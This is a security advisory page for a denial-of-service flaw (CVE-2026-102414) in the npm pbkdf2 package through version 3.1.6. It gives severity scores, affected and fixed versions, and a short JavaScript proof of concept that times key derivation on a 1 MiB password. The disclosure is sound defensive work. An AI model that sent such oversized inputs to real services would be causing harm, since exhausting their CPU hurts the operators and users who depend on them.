GHSA-477h-4r7f-fvrx

Suggest an improvement
Source
https://github.com/advisories/GHSA-477h-4r7f-fvrx
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-477h-4r7f-fvrx/GHSA-477h-4r7f-fvrx.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-477h-4r7f-fvrx
Aliases
  • CVE-2026-102414
Published
2026-10-06T13:40:10Z
Modified
2026-10-06T13:45:05Z
Severity
  • 3.7 (Low) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L CVSS Calculator
  • 6.3 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N CVSS Calculator
Summary
pbkdf2 rehashes long passwords on every iteration, enabling denial of service
Details

Summary

This is the same bug as Django had (CVE-2013-1443).

Details

A long password can cause a DoS because it is not using cached HMAC, length limits, or pre-hashing passwords longer than the block size of the hash function as per HMAC spec. This line of code hashes the full password each iteration: https://github.com/browserify/pbkdf2/blob/1c3b1f526b052a29b3b42120c9821895772df7e8/lib/sync.js#L60

Also see https://github.com/browserify/pbkdf2/issues/82

PoC

The first key will take a lot longer to generate when not using the native code and uses code from /lib/sync.js (ie when this if statement is true): https://github.com/browserify/pbkdf2/blob/1c3b1f526b052a29b3b42120c9821895772df7e8/index.js#L33-L37

var pbkdf2 = require('pbkdf2');
var createHash = require('create-hash');
var pw = ".".repeat(1048576); // 1 MiB

var t0 = performance.now();
var key1 = pbkdf2.pbkdf2Sync(pw, "salt", 1000, 32, "sha256");
var t1 = performance.now();
pw = createHash('sha256').update(pw).digest(); // HMAC specification for keys larger than block size
var key2 = pbkdf2.pbkdf2Sync(pw, "salt", 1000, 32, "sha256");
var t2 = performance.now();

console.log("First took:  " + (t1 - t0));
console.log("Second took: " + (t2 - t1));
console.log("Generated keys:");
console.log(key1);
console.log(key2);

Impact

DoS

Database specific
{
    "cwe_ids":  [
        "CWE-400"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2026-10-06T13:40:10Z",
    "nvd_published_at":  "2026-09-29T04:17:55Z",
    "severity":  "MODERATE"
}
References

Affected packages

npm / pbkdf2

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
3.1.7

Database specific

last_known_affected_version_range
"<= 3.1.6"
source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-477h-4r7f-fvrx/GHSA-477h-4r7f-fvrx.json"